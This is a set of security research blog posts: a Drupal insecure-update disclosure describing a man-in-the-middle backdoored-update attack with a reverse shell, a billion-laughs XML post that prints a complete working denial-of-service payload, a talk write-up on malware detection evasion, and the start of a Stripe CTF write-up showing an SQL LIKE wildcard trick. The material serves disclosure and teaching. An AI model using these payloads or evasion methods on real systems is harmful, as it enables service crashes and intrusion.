RESEARCH | January 6, 2016

Drupal – Insecure Update Process

Just a few days after installing Drupal v7.39, I noticed there was a security update available: Drupal v7.41. This new version fixes an open redirect in the Drupal core. In spite of my Drupal update process checking for updates, according to my local instance, everything was up to date: 

 

Issue #1: Whenever the Drupal update process fails, Drupal states that everything is up to date instead of giving a warning.

 

The issue was due to some sort of network problem. Apparently, in Drupal 6 there was a warning message in place, but this is not present in Drupal 7 or Drupal 8.
 
Nevertheless, if the scheduled update process fails, it is always possible to check for the latest updates by using the link that says “Check manually”. This link is valuable to an attacker because it can be abused in a cross-site request forgery (CSRF) attack to force the admin to check for updates whenever the attacker chooses:
 
  • http://yoursite/?q=admin/reports/updates/check
 
Since there is a CSRF vulnerability in the “Check manually” functionality (Drupal 8 is the only version not affected), this could also be used as a server-side request forgery (SSRF) attack against drupal.org. Administrators may unwittingly force their servers to request unlimited amounts of information from updates.drupal.org, consuming network bandwidth.
 
Issue #2: An attacker may force an admin to check for updates due to a CSRF vulnerability in the update functionality.
 
An attacker may care about updates because they are sent unencrypted, as the following Wireshark screenshot shows: 

 

 

To exploit unencrypted updates, an attacker must be suitably positioned to eavesdrop on the victim’s network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection, such as public WiFi, or a corporate or home network that is shared with a compromised computer.  
 
The update process downloads a plaintext version of an XML file at http://updates.drupal.org/release-history/drupal/7.x and checks to see if it is the latest version. This XML document can point to a backdoored version of Drupal.  

 

  1. The current security update (deliberately named “7.41 Backdoored”)
  2. The notice that the security update is required, along with a download link button
  3. The URL of the malicious update that will be downloaded
 
However, updating Drupal is a manual process. Another possible attack vector is to offer a backdoored version of any of the modules installed on Drupal. In the following example, a fake “Additional Help Hint” update is offered to the user:

 

 

Offering fake updates is a simple process. Once requests are being intercepted, a fake update response can be constructed for any module. When administrators click on the “Download these updates” buttons, they will start the update process.
 
This is how it looks from an attacker’s perspective before and after upgrading the “Additional Help Hint” module. First it checks for the latest version, and then it downloads the latest (malicious) version available. 


 

As part of the update, I included a reverse shell from pentestmonkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell) that will connect back to me, let me interact with the Linux shell, and finally, allow me to retrieve the Drupal database password:


Issue #3: Drupal security updates are transferred unencrypted without checking the authenticity, which could lead to code execution and database access.
 
You may have heard about such things in the past. Kurt Seifried from Linux Magazine wrote an article entitled “Insecure updates are the rule, not the exception” that mentioned that Drupal (among others) was not checking the authenticity of the software being downloaded. Moreover, Drupal itself has had an open discussion about this issue since April 2012 (https://www.drupal.org/node/1538118). This discussion was reopened after I reported the previous vulnerabilities to the Drupal Security Team on the 11th of November 2015.
 
You probably want to manually download updates for Drupal and its add-ons. At the time of publishing there are no fixes available.
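
When downloading an update manually, one way to compensate for the missing authenticity check is to compare the archive against a digest obtained over a trusted channel. The following is only a minimal sketch of that idea in Python: the byte strings are hypothetical stand-ins for a real archive, and it assumes a trusted SHA-256 digest is available at all, which this post does not confirm for Drupal releases.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as a lowercase hex string."""
    return hashlib.sha256(data).hexdigest()


def archive_matches(data: bytes, expected_hex: str) -> bool:
    """Compare the archive digest against a digest obtained out of band."""
    actual = sha256_hex(data)
    # compare_digest performs a constant-time string comparison.
    return hmac.compare_digest(actual, expected_hex.strip().lower())


# Hypothetical stand-ins for a genuine archive and a tampered copy.
genuine = b"contents of the genuine module archive"
tampered = genuine + b"<?php /* backdoor */ ?>"

# Assumption: in practice this digest would come from a trusted source,
# not be computed locally from the download itself.
trusted_digest = sha256_hex(genuine)

print(archive_matches(genuine, trusted_digest))   # True
print(archive_matches(tampered, trusted_digest))  # False
```

A digest fetched over the same unencrypted connection as the archive would give no protection, since an attacker in the middle could replace both.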
 

TL;DR – It is possible to achieve code execution and obtain the database credentials when performing a man-in-the-middle attack against the Drupal update process. All Drupal versions are affected.

RESEARCH | November 18, 2014

Die Laughing from a Billion Laughs

Recursion is the process of repeating items in a self-similar way, and that’s what the XML Entity Expansion (XEE)[1] is about: a small string is referenced a huge number of times.

Technology standards sometimes include features that affect the security of applications. Amit Klein found in 2002 that XML entities could be used to make parsers consume an unlimited amount of resources and then crash, which is called a billion laughs attack. When the XML parser tries to resolve the nested entities included in the document, the application starts consuming all the available memory until the process crashes.

This example shows an XML document with an embedded DTD schema that performs the attack.

 (you can copy and paste (without format) to try)
<!DOCTYPE TEST [
 <!ELEMENT TEST ANY>
 <!ENTITY LOL “LOL”>
 <!ENTITY LOL1 “&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;”>
 <!ENTITY LOL2 “&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;”>
 <!ENTITY LOL3 “&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;”>
 <!ENTITY LOL4 “&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;”>
 <!ENTITY LOL5 “&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;”>
 <!ENTITY LOL6 “&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;”>
 <!ENTITY LOL7 “&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;”>
 <!ENTITY LOL8 “&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;”>
 <!ENTITY LOL9 “&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;”>
]>

<TEST>&LOL9;</TEST>

The entity LOL9 in the example will be resolved as ten references to LOL8; each of these will in turn be resolved as ten references to LOL7, and so on. Finally, the CPU and/or memory will be affected by expanding the document into 10^9 copies of the string “LOL”, that is 3*10^9 (3,000,000,000) characters, and this could make the parser crash.
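
The size of the expansion can be worked out without ever building the string. This short Python sketch simply multiplies through the nesting levels; the function name and parameters are illustrative and not part of any XML library.

```python
def expanded_length(levels: int = 9, fanout: int = 10, base: str = "LOL") -> int:
    """Length in characters of the top-level entity once fully expanded."""
    length = len(base)           # the innermost entity, LOL
    for _ in range(levels):      # LOL1 .. LOL9 each repeat the previous level
        length *= fanout
    return length


total_chars = expanded_length()
print(total_chars)                # 3000000000
print(total_chars // len("LOL"))  # 1000000000
```

A document of well under a kilobyte therefore asks the parser to materialize roughly 3 GB of text.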

The SOAP specification states that a SOAP message must not contain a Document Type Declaration (DTD). Therefore, a SOAP processor can reject any SOAP message that contains a DTD.
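
A processor that wants to follow this rule can refuse a message as soon as a DTD starts, before any entity is expanded. Below is a minimal sketch using the expat bindings from the Python standard library; the exception class, function name, and the simplified messages (which are not real SOAP envelopes) are assumptions made for illustration.

```python
import xml.parsers.expat


class DTDNotAllowed(ValueError):
    """Raised when a message carries a Document Type Declaration."""


def parse_without_dtd(message: bytes) -> None:
    """Parse message, aborting as soon as a DOCTYPE declaration starts."""
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat when it encounters <!DOCTYPE ...>.
        raise DTDNotAllowed(f"DTD {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(message, True)


plain = b"<Envelope><Body>ok</Body></Envelope>"
with_dtd = b'<!DOCTYPE TEST [<!ENTITY LOL "LOL">]><TEST>&LOL;</TEST>'

parse_without_dtd(plain)  # no DTD, so nothing is raised
try:
    parse_without_dtd(with_dtd)
except DTDNotAllowed as exc:
    print("rejected:", exc)
```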

Regardless of what the specification indicates, certain SOAP implementations do parse DTD schemas within SOAP messages:

  • CVE-2013-1643: The SOAP parser (in PHP before 5.3.22 and 5.4.x before 5.4.13) allows remote attackers to read arbitrary files via a SOAP WSDL file containing an XML external entity declaration in conjunction with an entity reference.
  • CVE-2010-1632: Apache Axis2 before 1.5.2 (as used in IBM WebSphere Application Server 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products) does not properly reject DTDs in SOAP messages.
  • CVE-2004-2244: The XML parser (in Oracle 9i Application Server Release 2 9.0.3.0 and 9.0.3.1, 9.0.2.3 and earlier, and Release 1 1.0.2.2 and 1.0.2.2.2, and Database Server Release 2 9.2.0.1 and later) allows remote attackers to cause a denial of service with CPU and memory consumption via a SOAP message containing a crafted DTD.

Here is an example of a parser that is not following the specification and is instead referencing a DTD on a SOAP message [2].

Figure 1: SOAP billion laughs

This vulnerability also affects the Microsoft XML Core Services (MSXML), a service that allows applications to build Windows-native XML-based applications. If you paste the billion laughs attack code into Microsoft Word for Mac, the memory will start getting depleted until Word crashes. You can try it yourself: just copy, paste, and die laughing.

References:
[1] CAPEC-197: XEE (XML Entity Expansion) (http://capec.mitre.org/data/definitions/197.html)
[2] CAPEC-228: Resource Depletion through DTD Injection in a SOAP Message (http://capec.mitre.org/data/definitions/228.html)
INSIGHTS | November 21, 2012

The Future of Automated Malware Generation

This year I gave a series of presentations on “The Future of Automated Malware Generation”. This past week the presentation had its final showing in Tokyo, on the 10th anniversary of PacSec.

Hopefully you were able to attend one of the following conferences where it was presented:

  • IOAsis (Las Vegas, USA)
  • SOURCE (Seattle, USA)
  • EkoParty (Buenos Aires, Argentina)
  • PacSec (Tokyo, Japan)

Motivation / Intro

Much of this presentation was inspired by a number of key motivations:
  1. Greg Hoglund’s talk at Blackhat 2010 on malware attribution and fingerprinting
  2. The undeniable steady year by year increase in malware, exploits and exploit kits
  3. My unfinished attempt at adding automatic classification to the cuckoo sandbox
  4. An attempt to clear up the perception by many consumers and corporations that many security products are resistant to simple evasion techniques and contain some “secret sauce” that sets them apart from their competition
  5. The desire to educate consumers and corporations on past, present and future defense and offense techniques
  6. Lastly to help reemphasize the philosophy that when building or deploying defensive technology it’s wise to think offensively…and basically try to break what you build
Since the point of the talk is the future of automated malware generation, I’ll start by explaining the current state of automated malware generation, and then I’ll move on to reviewing the defenses found in most products today.
Given enough time, resources and skill, every defense technique can be defeated. To prove this, I’ll share some of the associated offensive techniques. I will then discuss new defense technologies that you’ll start to hear more about and, as has been the cycle in any war, for each defense there will come a new offensive technique. So I will then discuss the future of automated malware generation. This is a long blog post, but I hope you find it interesting!

Current State of Automated Malware Generation

Automated Malware Generation centers on Malware Distribution Networks (MDNs).

MDNs are organized, distributed networks that are responsible for the entire exploit and infection vector.

There are several players involved:

  • Pay-per-install client – organizations that write malware and gain a profit from having it installed on as many machines as possible
  • Pay-per-install services – organizations that get paid to exploit and infect user machines and in many cases use pay-per-install affiliates to accomplish this
  • Pay-per-install affiliates – organizations that own a lot of the infrastructure and processes necessary to compromise legitimate web pages, redirect users through traffic direction services (TDSs), infect users with exploits (in some cases exploit kits) and finally, if successful, download malware from a malware repository.
Figure: Blackhole exploit kit download chain
Source: Manufacturing Compromise: The Emergence of Exploit-as-a-Service 
There are a number of different types of malware repositories, some that contain the same binary for the life-time of a particular attack campaign, some that periodically update or repackage the binary to avoid and evade simple detection techniques, and polymorphic/metamorphic repositories that produce a unique sample for each user request. More complex attacks generally involve the latter.


Figure: Basic Break-down of Malware Repository Types

Current State of Malware Defense

Most desktop and network security products on the market today use the following techniques to detect malware:
  • hashes – cryptographic checksums of either the entire malware file or sections of the file; in some cases these could include black-listing and white-listing
  • signatures – syntactical pattern matching using conditional expressions (in some cases format-aware/contextual)
  • heuristics – An expression of characteristics and actions using emulation, API hooking, sand-boxing, file anomalies and/or other analysis techniques
  • semantics – transformation of specific syntax into a single abstract / intermediate representation to match from using more abstract signatures and heuristics

EVERY defense technique can be broken – with enough time, skill and resources.

In the above defensive techniques:

  • hash-based detection can be broken by changing the binary by a single byte
  • signature-based detection can be broken using syntax mutation, e.g.
    • Garbage Code Insertion e.g. NOP, “MOV ax, ax”, “SUB ax, 0”
    • Register Renaming e.g. using EAX instead of EBX (as long as EAX isn’t already being used)
    • Subroutine Permutation e.g. changing the order in which subroutines or functions are called as long as this doesn’t affect the overall behavior
    • Code Reordering through Jumps e.g. inserting test instructions and conditional and unconditional branching instructions in order to change the control flow
    • Equivalent instruction substitution e.g. MOV EAX, EBX <-> PUSH EBX, POP EAX
  • heuristics-based detection can be broken by avoiding the characteristics the heuristics engine is using or by using uncommon instructions that the heuristics engine might be unable to understand in its emulator (if an emulator is being used)
  • semantics-based detection can be broken by using techniques such as time-lock puzzles. Semantics-based detection is unlikely to be used at a higher level, such as in network defenses, due to performance issues. Also, because implementation requires extensive scope, there is a high likelihood that not all cases have been covered. Semantics-based detection is extremely difficult to get right given the performance requirements of a security product.
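
The first point in the list above, that a single-byte change defeats hash-based detection, is easy to demonstrate. In this Python sketch the “binary” is a made-up byte string and the blacklist is a plain set of SHA-256 digests; both are assumptions for illustration, not how any particular product stores its hashes.

```python
import hashlib

# Hypothetical stand-in for a known-bad binary; any bytes would do.
original = b"MZ\x90\x00" + b"\x00" * 60 + b"payload"
blacklist = {hashlib.sha256(original).hexdigest()}

# Change the sample by a single byte (here, by appending one).
mutated = original + b"\x00"


def is_blacklisted(sample: bytes) -> bool:
    """Return True if the sample's SHA-256 digest is on the blacklist."""
    return hashlib.sha256(sample).hexdigest() in blacklist


print(is_blacklisted(original))  # True
print(is_blacklisted(mutated))   # False
```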

There are a number of other examples where defense techniques were easily defeated by properly targeted research (generally speaking). One example is a post published only a few weeks ago by Trail of Bits [Trail of Bits Blog] analyzing ExploitShield’s exploitation prevention technology. In my opinion the response from Zero Vulnerability Labs (no longer available) was appropriate, but it does show that a defense technique can be broken by an attacker if that technology is studied and understood (which isn’t that complicated to figure out).

Malware Trends

Check any number of reports and you can see that malware is on the rise (keep in mind these are vendor reports and the vendors have a stake in the results, but since there really is no other source for the information we’ll use them as the accepted experts on the subject) [Symantec] [Trend] [McAfee] [IBM X-Force] [Microsoft] [RSA].

Source: McAfee Global Q1 2012 Threat Report
The same increase in samples has also been reported for mobile malware [F-Secure Mobile Threat Report].
Since the rise of malware can’t be matched by continually hiring another analyst to analyze malware (this process has its limitations), security companies deploy high-interaction and low-interaction sandboxes. These sandboxes run the malware, analyze its behavior and attempt to trigger various heuristics that will auto-classify the malware by hash. If a sandbox is not able to auto-classify a sample, then typically the malware is added to a suspicious bucket for a malware analyst to manually review. Thus malware analysts are bottlenecks in the process of preemptive malware classification.
In addition, a report from Cisco last year found that 33% of Web malware encountered was zero-day malware not detectable by traditional signature-based methodologies at the time of encounter [Cisco 2011 4Q Global Threat Report].
33%! Obviously this means there is work to be done on the detection/defense side of the fence.

So how can the security industry use automatic classification? Well, in the last few years a data-driven approach has been the obvious step in the process.

The Future of Malware Defense

With the increase in malware, exploits, exploit kits, campaign-based attacks and targeted attacks, reliance on automation will have to be the future. The overall goal of malware defense has been to a larger degree classification and to a smaller degree clustering and attribution.

Thus statistics and data-driven decisions have been an obvious direction that many of the security companies have started to introduce, either by heavily relying on this process or as a supplemental layer to existing defensive technologies to help in predictive pattern-based analysis and classification.

Where statistics is a discipline that makes you understand data and forces decisions based on data, machine learning is where we train computers to make statistical decisions on real-time data based on inputted data.
While machine learning as a concept has been around for decades, it’s only more recently that it’s being used in web filtering, data-leakage prevention (DLP), and malware content analysis.

Training machine learning classifiers involves breaking down whatever content you want to analyze e.g. a network stream or an executable file into “features” (basically characteristics).

For example, historically certain malware:

  • Has no icon
  • Has no description or company in the resource section
  • Is packed
  • Lives in the Windows directory or user profile

Each of the above qualities/characteristics can be considered “features”. Once the defensive technology creates a list of features, it then builds a parser capable of breaking down the content to find those features. For example, if the content is a PE WIN32 executable, a PE parser will be necessary. The features would include anything you can think of that is characteristic of a PE file.

The process then involves training a classifier on a positive (malicious) and negative (benign) sample set. Once the classifier is trained it can be used to determine if a future unknown sample is benign or malicious and classify it accordingly.
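
To make the training step concrete, here is a deliberately tiny sketch in Python of a naive Bayes classifier over the four example features listed earlier. The feature names, the training vectors, and the equal class priors are all made up for illustration; real products use far larger corpora, many more features, and usually an established machine learning library.

```python
import math

FEATURES = ["no_icon", "no_description", "is_packed", "in_windows_dir"]

# Made-up training vectors (1 = feature present), one tuple per sample.
MALICIOUS = [(1, 1, 1, 1), (1, 1, 1, 0), (1, 0, 1, 1), (0, 1, 1, 1)]
BENIGN = [(0, 0, 0, 0), (0, 0, 1, 0), (1, 0, 0, 0), (0, 0, 0, 1)]


def train(samples):
    """Estimate P(feature = 1) per feature, with add-one smoothing."""
    n = len(samples)
    return [(sum(s[i] for s in samples) + 1) / (n + 2)
            for i in range(len(FEATURES))]


def log_likelihood(sample, probs):
    """Log-probability of the sample, treating features as independent."""
    return sum(math.log(p if x else 1 - p) for x, p in zip(sample, probs))


def classify(sample, p_mal, p_ben):
    """Pick the class with the higher likelihood (equal priors assumed)."""
    if log_likelihood(sample, p_mal) > log_likelihood(sample, p_ben):
        return "malicious"
    return "benign"


p_mal, p_ben = train(MALICIOUS), train(BENIGN)
print(classify((1, 1, 1, 0), p_mal, p_ben))  # malicious
print(classify((0, 0, 0, 0), p_mal, p_ben))  # benign
```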

Let me give you a more detailed example: If you’ve ever played around with malicious PDFs you know there are differences between the structure of a benign PDF and a malicious PDF.
Here are some noteworthy characteristics in the structure of a PDF (FireEye Blog/Presentation – Julia Wolf):
  • Compressed JavaScript
  • PDF header location e.g. %PDF – within first 1024 bytes
  • Does it contain an embedded file (e.g. flash, sound file)
  • Signed by a trusted certificate
  • Encoded/Encrypted Streams e.g. FlateDecode is used quite a lot in malicious PDFs
  • Names hex escaped
  • Bogus xref table
All the above are features that can be used to feed the classifier during training against benign and malicious sample sets (check out “Scoring PDF structure to detect malicious file” from my friend Rodrigo Montoro (YouTube)).
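
As a rough illustration of what extracting such features might look like, the Python sketch below scans raw PDF bytes for a few of the characteristics listed above. It is a crude byte-level search rather than a real PDF parser, and the feature names and the sample bytes are hypothetical.

```python
import re


def pdf_features(data: bytes) -> dict:
    """Extract a few coarse structural features from raw PDF bytes."""
    header_at = data.find(b"%PDF")
    return {
        # Header starts somewhere within the first 1024 bytes.
        "header_in_first_1024": 0 <= header_at < 1024,
        "has_javascript": b"/JavaScript" in data or b"/JS" in data,
        "has_embedded_file": b"/EmbeddedFile" in data,
        "uses_flatedecode": b"/FlateDecode" in data,
        # Names containing #xx hex escapes, e.g. /J#61vaScript.
        "hex_escaped_names": bool(re.search(rb"/\w*#[0-9A-Fa-f]{2}", data)),
    }


# Hypothetical fragment, not a complete or valid PDF file.
sample = (b"garbage\n%PDF-1.4\n"
          b"1 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj")

for name, value in pdf_features(sample).items():
    print(name, value)
```

Each resulting dictionary could then be turned into a feature vector for training, in the same way as the executable features discussed earlier.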

There are two open-source projects that I want to mention using machine learning to determine if a file is malicious:

PDF-XRay from Brandon Dixon:

An explanation of how it works from the pdf-xray site is as follows:

Adobe Open Source Malware Classification Tool by Karthik Raman/Adobe

Details (from website): Perform quick, easy classification of binaries for malware analysis.
Published results: 98.21% accuracy, 6.7% false positive rate
7 features = DebugSize, ImageVersion, IatRVA, ExportSize, ResourceSize, VirtualSize2, NumberOfSections
Personal remarks: This tool is a great proof of concept, but my results weren’t as successful as Karthik’s, which I’m told were obtained only on binaries that were not packed. My sample set included packed binaries, unpacked binaries, and files that had never been packed.


Shifting away from analysis of files, we can also attempt to distinguish shellcode on the wire from normal traffic. Using Markov chains, a technique from the field of Artificial Intelligence that is common in natural language processing, we can analyze a network stream of instructions to see if the sequence of instructions is likely to be exploit code.

The example below attempts to show that most exploit code (shellcode) follows a basic skeleton, be it a decoder loop, decoding a payload and then jumping to that payload, or finding the delta, getting the kernel32 imagebase, resolving the addresses for GetProcAddress and LoadLibraryA, calling various functions and finally executing the rest of your payload.
There is a finite set of published methods to do this, and if you can use semantics, you can further limit the possible sequences and determine if the network stream contains instructions and, further, if those instructions are shellcode.
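
A first-order Markov chain over instruction mnemonics captures this idea in a very simplified form: learn how often one instruction follows another in known shellcode, then score new sequences by how likely their transitions are. The Python sketch below uses invented mnemonic sequences and add-one smoothing; it assumes the stream has already been disassembled and is not taken from any real detection engine.

```python
import math
from collections import defaultdict


def train_bigrams(sequences):
    """Count how often each mnemonic is followed by each other mnemonic."""
    counts = defaultdict(lambda: defaultdict(int))
    for seq in sequences:
        for prev, cur in zip(seq, seq[1:]):
            counts[prev][cur] += 1
    return counts


def avg_log_prob(seq, counts, vocab_size):
    """Mean log-probability per transition, with add-one smoothing."""
    total = 0.0
    for prev, cur in zip(seq, seq[1:]):
        row = counts.get(prev, {})
        total += math.log((row.get(cur, 0) + 1) /
                          (sum(row.values()) + vocab_size))
    return total / max(len(seq) - 1, 1)


# Invented training data loosely shaped like a decoder-loop skeleton.
shellcode_like = [
    ["jmp", "call", "pop", "xor", "loop", "jmp"],
    ["jmp", "call", "pop", "xor", "inc", "loop", "jmp"],
]
candidate = ["jmp", "call", "pop", "xor", "loop", "jmp"]
ordinary = ["push", "mov", "add", "ret", "push", "mov"]

vocab = {m for seq in shellcode_like + [candidate, ordinary] for m in seq}
model = train_bigrams(shellcode_like)

score_candidate = avg_log_prob(candidate, model, len(vocab))
score_ordinary = avg_log_prob(ordinary, model, len(vocab))
print(score_candidate > score_ordinary)  # True
```

A detector built this way would flag streams whose score exceeds a threshold chosen from benign traffic; picking that threshold is where the false positive trade-off comes in.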

The Future of Automated Malware Generation

In many cases the path of attack and defense techniques follows the same story of cat and mouse. Just like Tom and Jerry, the chase continues forever. In the context of security, new technology is introduced, new attacks then emerge and, in response, new countermeasures are brought in to detect those attacks. An attacker’s game can come to an end IF they make a mistake, but whereas cyber-criminal organizations can claim a binary 0 or 1 success or failure, defense can never really claim a victory over all its attackers. It’s a “game” that must always continue.

That being said, you’ll hear more and more products and security technologies talk about machine learning like it’s this unbeatable new move in the game. Granted, you’ll hear it mostly from savvy marketing, product managers or sales folks. In reality it’s another useful layer to slow down an attacker trying to get to their end goal, but it’s by no means invincible.

Use of machine learning can be circumvented by an attacker in several possible ways:

  • Likelihood of false positives / false negatives due to weak training corpus 
  • Circumvention of classification features
  • Inability to parse/extract features from content
  • Ability to poison training corpus
Let’s break down each of those points, because if the next stage of defense will increasingly include machine learning, then attackers will be attempting to include various evasion techniques to avoid this new detection technique.
Likelihood of false positives / false negatives due to weak training corpus
If the defense side creates models based on a small sample set, or on a sample set that isn’t diverse enough, then the model will be too restrictive and thus produce false negatives. If a product has too many false positives, users won’t trust it and, if given the choice, will ignore the results. Products that typically have too many false positives will be discontinued. Attackers can benefit from a weak training corpus by using less popular techniques/vulnerabilities that most likely haven’t been used in training and won’t be caught by the classifier.
If the defense creates models based only on malicious files and not enough benign files, then there will be tons of false positives. Thus, if the attacker models their files to look more representative of good files, there will be a higher likelihood that the acceptable threshold to mitigate false positives will allow the malicious file through.
Circumvention of classification features
At the start of this blog I mentioned that I’m currently attempting to add automatic classification to the cuckoo sandbox, which is an open source behavioral analysis framework. If I were to add such code, it would be open source and any techniques including features would be exposed. Thus, all an attacker would have to do is read my source code, and avoid the features; this is also true for any product that an attacker can buy or demo. They could either read the source code or reverse engineer the product and see which features are being used and attempt to trick the classification algorithm if the threshold/weights/characteristics can be determined.
Inability to parse/extract features from content
Classification using machine learning is 100% reliant on the fact that the features can be extracted from the content and fed to the classification algorithm. But what if the executable is a .NET binary (Japanese Remote Control Virus) and the engine can’t interpret .NET binaries, or what if the format changes or gets updated, e.g. PDF 2.0? For each of these changes, a parser must be built, updated and shipped out. Attackers have the advantage of a window of time between product updates or, again with proper research, an understanding that certain products simply can’t handle a particular format in order to extract features.
Ability to poison training corpus
Training a machine learning classifier involves training the algorithm against a known malicious set and a known benign set. If an attacker were able to poison either set, the results and final classification determination would be flawed. This can occur in numerous ways. For example: the attacker releases a massive set of files onto the Internet on the off chance that a security product company will use it as its main source of samples, or they poison a number of known malware behavior frameworks that share samples with security companies, such as VirusTotal or malwr, with bogus malware. This scenario is unlikely, because most companies wouldn’t rely on one major source for all their testing, but it is still worth mentioning.

Conclusion

In reality, we haven’t yet seen malware that contains anti-machine-learning classification or anti-clustering techniques. What we have seen is more extensive use of on-the-fly symmetric-key encryption where the key isn’t hard-coded in the binary itself, but is derived from something unique about the target machine that is being infected. Take Zeus, for example, which downloads an encrypted binary once the machine has been infected, where the key is unique to that machine, or Gauss, which had a DLL that was encrypted with a key only found on the targeted user’s machine.

What this accomplishes is that the binary can only work on the intended target machine. It’s possible that an emulator would break, but sending it off to home base or the cloud for behavioral and static analysis will certainly fail, because it simply can’t be decrypted and run.

Most defensive techniques, if studied, targeted and analyzed, can be evaded; all it takes is time, skill and resources. Using machine learning to detect malicious executables, exploits and/or network traffic is no exception. At the end of the day it’s important that you at least understand that your defenses are penetrable, but that a smart layered defense is key, where every layer forces the attackers to take their time, forces them to learn new skills and slowly gives away their resources, position and possibly intent, hopefully giving you enough time to be notified of the attack and stop it before exfiltration of data occurs. What a smart layered defense looks like is different for each network, depending on where your assets are and how your network is set up, so there is no way for me to share a one-size-fits-all diagram. I’ll leave that to you to think about.

Useful Links:
Coursera – Machine Learning Course
CalTech – Machine Learning Course
MLPY (https://mlpy.fbk.eu/)
PyML (http://pyml.sourceforge.net/)
Milk (http://pypi.python.org/pypi/milk/)
Shogun (http://raetschlab.org/suppl/shogun) Code is in C++ but it has a python wrapper.
MDP (http://mdp-toolkit.sourceforge.net) Python library for data mining
PyBrain (http://pybrain.org/)
Orange (http://www.ailab.si/orange/) Statistical computing and data mining
PYMVPA (http://www.pymvpa.org/)
scikit-learn (http://scikit-learn.org): Numpy / Scipy / Cython implementations for major algorithms + efficient C/C++ wrappers
Monte (http://montepython.sourceforge.net) a software for gradient-based learning in Python
Rpy2 (http://rpy.sourceforge.net/): Python wrapper for R


About Stephan
Stephan Chenette has been involved in computer security professionally since the mid-90s, working on vulnerability research, reverse engineering, and development of next-generation defense and attack techniques. As a researcher he has published papers, security advisories, and tools. His past work includes the script fragmentation exploit delivery attack and work on the open source web security tool Fireshark.

Stephan is currently the Director of Security Research and Development at IOActive, Inc.
Twitter: @StephanChenette

INSIGHTS | August 29, 2012

Stripe CTF 2.0 Write-Up

Hello, World!

I had the opportunity to play and complete the 2012 Stripe CTF 2.0 this weekend. I would have to say this was one of the most enjoyable CTFs I’ve played by far. They did an excellent job. I wanted to share with you a detailed write-up of the levels, why they’re vulnerable, and how to exploit them. It’s interesting to see how multiple people take different routes on problems, so I’ve included some of the solutions by Michael Milvich (IOActive), Ryan O’Horo (IOActive), Ryan Linn (Spiderlabs), as well as my own (Joseph Tartaro, IOActive).
I hope this write-up gives you guys the opportunity to learn something new or get a better understanding of how I approached this CTF. I’ve included all the main source code that was available at the information page of each level, even if it was unnecessary, just so people could see it all if they were interested. If you have any further questions you should feel free to e-mail me at Joseph.Tartaro[at]ioactive[dot]com, or make a comment below.
Let’s get started!
Level 0  –  SQL Injection
Level 1  –  Misuse of PHP Function on Untrusted Data
Level 2  –  File Upload Vulnerability
Level 3  –  SQL Injection
Level 4  –  XSS/XSRF
Level 5  –  Insecure Communication
Level 6  –  XSS/XSRF
Level 7  –  SHA1 Length-Extension Vulnerability
Level 8  –  Side Channel Attack
Source Code 

Level 0:

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we’ve prepared a list of helpful resources for you. You can chat with fellow solvers in the CTF chatroom (also accessible in your favorite IRC client at irc://irc.stripe.com:+6697/ctf).
We’ll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes
You can access the Secret Safe at https://level00-2.stripe-ctf.com/user-juwcldvclk. The Safe’s code is included below, and can also be obtained via git clone https://level00-2.stripe-ctf.com/user-juwcldvclk/level00-code.

So quickly looking at the code, the main areas we’re interested in are right here ….

*SNIP*

sqlite3 = require('sqlite3'); // SQLite (database) driver

*SNIP*

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
      if (err) throw err;

      renderPage(res, {namespace: namespace, secrets: secrets});
    });

We can see that it’s querying the SQL database with our user-supplied input. We also know that it is an sqlite3 database. When looking at the SQL statement, we can see that it’s using the LIKE operator, which happens to have a wildcard character (%). When we supply the wildcard character, it will respond with all the secrets in the database.
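
The effect of the wildcard can be reproduced locally. The following Python sketch uses the standard sqlite3 module with an in-memory database; the table contents are invented, and the query mirrors the shape of the level’s statement (with single quotes around the string literal) rather than being the level’s actual code.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE secrets (key TEXT, secret TEXT)")
db.executemany(
    "INSERT INTO secrets VALUES (?, ?)",
    [
        ("alice.note", "alice's secret"),
        ("level01.password", "hypothetical-password"),
    ],
)

# Same shape as the level's query: the namespace is bound as a parameter,
# then concatenated with '.%' to form the LIKE pattern.
QUERY = "SELECT key, secret FROM secrets WHERE key LIKE ? || '.%'"


def lookup(namespace):
    """Return all rows whose key matches '<namespace>.%'."""
    return db.execute(QUERY, (namespace,)).fetchall()


print(lookup("alice"))  # only the key starting with "alice."
print(lookup("%"))      # pattern becomes "%.%", so every row matches
```

Note that the query is parameterized, so this is not classic injection of SQL syntax; the problem is that the bound value is still interpreted as a LIKE pattern.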

Level 1:

